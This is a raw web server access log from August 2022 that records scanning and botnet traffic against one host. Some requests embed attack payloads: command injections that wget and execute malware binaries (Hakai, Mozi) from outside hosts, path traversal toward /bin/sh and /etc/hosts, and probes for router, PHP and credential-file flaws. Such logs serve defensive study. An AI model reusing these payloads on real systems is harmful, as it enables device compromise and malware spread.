185.196.220.70 - - [04/Aug/2022:00:21:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [04/Aug/2022:00:21:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
221.2.163.231 - - [04/Aug/2022:00:25:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
221.2.163.231 - - [04/Aug/2022:00:25:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
185.7.214.104 - - [04/Aug/2022:00:25:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:00:28:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
106.251.118.122 - - [04/Aug/2022:00:30:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Aug/2022:00:31:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
221.2.163.231 - - [04/Aug/2022:00:31:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
221.2.163.231 - - [04/Aug/2022:00:31:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
185.196.220.70 - - [04/Aug/2022:00:37:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [04/Aug/2022:00:40:00 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.42.113 - - [04/Aug/2022:00:41:00 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:00:41:43 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:00:42:12 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.196.220.70 - - [04/Aug/2022:00:42:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.196.220.70 - - [04/Aug/2022:00:44:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.196.220.70 - - [04/Aug/2022:00:46:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [04/Aug/2022:00:47:02 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
41.220.240.210 - - [04/Aug/2022:00:48:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.196.220.70 - - [04/Aug/2022:00:49:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [04/Aug/2022:00:49:39 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.120.183.70 - - [04/Aug/2022:00:49:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
201.150.182.211 - - [04/Aug/2022:00:49:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:00:52:19 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
201.150.173.243 - - [04/Aug/2022:00:53:35 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 324 "-" "-"
201.150.173.243 - - [04/Aug/2022:00:53:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.118.53.210 - - [04/Aug/2022:00:54:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
106.251.118.122 - - [04/Aug/2022:00:56:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Aug/2022:00:57:21 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:01:00:14 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:01:02:34 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
114.30.230.232 - - [04/Aug/2022:01:03:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
139.59.154.112 - - [04/Aug/2022:01:04:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0"
185.196.220.70 - - [04/Aug/2022:01:07:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.7.214.104 - - [04/Aug/2022:01:08:06 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
41.59.51.185 - - [04/Aug/2022:01:08:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.196.220.70 - - [04/Aug/2022:01:10:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
120.34.164.84 - - [04/Aug/2022:01:11:51 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
45.148.10.81 - - [04/Aug/2022:01:13:26 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.7.214.104 - - [04/Aug/2022:01:17:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.199.207.203 - - [04/Aug/2022:01:17:26 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
128.199.207.203 - - [04/Aug/2022:01:17:27 +0200] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.207.203 - - [04/Aug/2022:01:17:28 +0200] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.207.203 - - [04/Aug/2022:01:17:29 +0200] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.207.203 - - [04/Aug/2022:01:17:30 +0200] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.207.203 - - [04/Aug/2022:01:17:31 +0200] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Roku/DVP-9.10 (289.10E04111A)"
128.199.207.203 - - [04/Aug/2022:01:17:32 +0200] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
128.199.207.203 - - [04/Aug/2022:01:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:01:18:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.141.34 - - [04/Aug/2022:01:19:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
43.131.66.209 - - [04/Aug/2022:01:20:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
185.7.214.104 - - [04/Aug/2022:01:23:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
193.118.53.210 - - [04/Aug/2022:01:24:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:01:24:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
181.214.218.69 - - [04/Aug/2022:01:25:42 +0200] "POST /29369674 HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Microsoft Windows NT 6.2.9200.0); rv:22.0) Gecko/20130405 Firefox/22.0"
185.7.214.104 - - [04/Aug/2022:01:27:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.199.50.247 - - [04/Aug/2022:01:30:29 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
128.1.248.42 - - [04/Aug/2022:01:34:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:01:34:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
117.223.202.221 - - [04/Aug/2022:01:35:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.7.214.104 - - [04/Aug/2022:01:41:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
147.182.202.123 - - [04/Aug/2022:01:42:43 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
147.182.202.123 - - [04/Aug/2022:01:42:43 +0200] "GET /system_api.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.202.123 - - [04/Aug/2022:01:42:44 +0200] "GET /c/version.js HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.202.123 - - [04/Aug/2022:01:42:44 +0200] "GET /streaming/clients_live.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.202.123 - - [04/Aug/2022:01:42:45 +0200] "GET /stalker_portal/c/version.js HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.202.123 - - [04/Aug/2022:01:42:46 +0200] "GET /stream/live.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36"
147.182.202.123 - - [04/Aug/2022:01:42:46 +0200] "GET /flu/403.html HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
147.182.202.123 - - [04/Aug/2022:01:42:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:01:44:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.221.192.26 - - [04/Aug/2022:01:44:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
61.6.171.74 - - [04/Aug/2022:01:44:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Aug/2022:01:45:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "HELP" 501 319 "-" "-"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "l9tcpid/v1.1.0"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 405 378 "-" "Go-http-client/1.1"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "CONNECT leakix.net:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
161.35.86.181 - - [04/Aug/2022:01:45:56 +0200] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 333 "-" "Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
161.35.86.181 - - [04/Aug/2022:01:45:58 +0200] "GET /.DS_Store HTTP/1.1" 404 314 "-" "Go-http-client/1.1"
161.35.86.181 - - [04/Aug/2022:01:45:58 +0200] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
161.35.86.181 - - [04/Aug/2022:01:45:58 +0200] "GET /login.action HTTP/1.1" 404 317 "-" "l9explore/1.3.0"
161.35.86.181 - - [04/Aug/2022:01:45:58 +0200] "GET /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 380 "-" "l9explore/1.3.0"
161.35.86.181 - - [04/Aug/2022:01:45:58 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
161.35.86.181 - - [04/Aug/2022:01:45:58 +0200] "GET /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "l9explore/1.3.0"
91.245.26.58 - - [04/Aug/2022:01:47:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
185.7.214.104 - - [04/Aug/2022:01:51:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
108.27.54.116 - - [04/Aug/2022:01:53:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
108.27.54.116 - - [04/Aug/2022:01:53:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
43.153.10.221 - - [04/Aug/2022:01:55:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.64.1"
143.244.42.113 - - [04/Aug/2022:01:57:20 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
88.229.159.212 - - [04/Aug/2022:01:57:28 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Aug/2022:01:58:39 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.71.226.108 - - [04/Aug/2022:02:00:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
143.244.42.113 - - [04/Aug/2022:02:06:55 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:02:09:49 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:02:11:01 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:02:11:18 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:02:12:04 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.199.50.247 - - [04/Aug/2022:02:13:54 +0200] "GET /cgi-bin/luci HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:1.7.3) Gecko/20041001 Firefox/0.10.1"
45.152.208.92 - - [04/Aug/2022:02:14:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:02:14:55 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.42.113 - - [04/Aug/2022:02:17:33 +0200] "GET http://dyn.epicgifs.net/test6956.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
192.181.5.208 - - [04/Aug/2022:02:19:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
185.7.214.104 - - [04/Aug/2022:02:21:33 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
162.142.125.212 - - [04/Aug/2022:02:22:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
162.142.125.212 - - [04/Aug/2022:02:22:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.212 - - [04/Aug/2022:02:22:11 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.7.214.104 - - [04/Aug/2022:02:23:27 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.7.214.104 - - [04/Aug/2022:02:26:48 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
109.237.103.123 - - [04/Aug/2022:02:31:52 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.123 - - [04/Aug/2022:02:31:52 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
185.7.214.104 - - [04/Aug/2022:02:33:50 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
128.14.141.34 - - [04/Aug/2022:02:41:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
167.248.133.47 - - [04/Aug/2022:02:42:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.47 - - [04/Aug/2022:02:42:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
179.43.155.171 - - [04/Aug/2022:02:44:03 +0200] "\x16\x03\x01" 501 318 "-" "-"
179.43.155.171 - - [04/Aug/2022:02:44:03 +0200] "GET /Dockerrun.aws.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1"
42.114.25.58 - - [04/Aug/2022:02:44:16 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
18.192.56.13 - - [04/Aug/2022:02:49:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
18.192.56.13 - - [04/Aug/2022:02:49:46 +0200] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
88.229.159.212 - - [04/Aug/2022:02:58:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
2.57.122.98 - - [04/Aug/2022:03:03:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.148.10.81 - - [04/Aug/2022:03:05:19 +0200] "GET http://example.com/ HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
2.57.122.98 - - [04/Aug/2022:03:15:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
167.94.146.60 - - [04/Aug/2022:03:16:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.60 - - [04/Aug/2022:03:16:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.60 - - [04/Aug/2022:03:16:24 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
2.57.122.98 - - [04/Aug/2022:03:17:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.95.55.5 - - [04/Aug/2022:03:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
2.57.122.98 - - [04/Aug/2022:03:20:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
